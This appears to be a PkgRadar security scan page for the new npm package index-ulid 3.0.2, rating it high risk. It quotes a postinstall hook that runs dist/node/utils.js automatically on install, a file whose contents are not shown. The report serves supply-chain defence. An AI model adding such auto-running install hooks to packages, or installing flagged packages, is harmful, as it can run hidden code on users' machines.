PkgRadar

npm · registry.npmjs.org

index-ulid

Install Lifecycle Remote Or Exec: postinstall="node -e \"const fs=require('node:fs');const required=['dist/node/index.cjs','dist/node/index.js','dist/node/utils.js','dist/browser/index.cjs','dist/browser/index.js','dist/index.d.ts','dist/cli.js'];const missing=required.filter((f)=>!fs.existsSync(f));if(missing.length){throw new Error('Missing required publish artifacts: '+missing.join(', '));}\" && node dist/node/utils.js"

Why PkgRadar flagged 3.0.2

SeveritySignalEvidence
highInstall Lifecycle Remote Or Execpostinstall="node -e \"const fs=require('node:fs');const required=['dist/node/index.cjs','dist/node/index.js','dist/node/utils.js','dist/browser/index.cjs','dist/browser/index.js','dist/index.d.ts','dist/cli.js'];const missing=required.filter((f)=>!fs.existsSync(f));if(missing.length){throw new Error('Missing required publish artifacts: '+missing.join(', '));}\" && node dist/node/utils.js" · package.json
highNew Account With Lifecycle Hookpackage first published 0 day(s) ago, 1 total version(s), has lifecycle hook · package.json

Scanned versions

VersionVerdictScoreScanned (UTC)
3.0.2High risk402026-06-11

Block this in CI

PkgRadar gates index-ulid (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm [email protected]
index-ulid — npm security scan | PkgRadar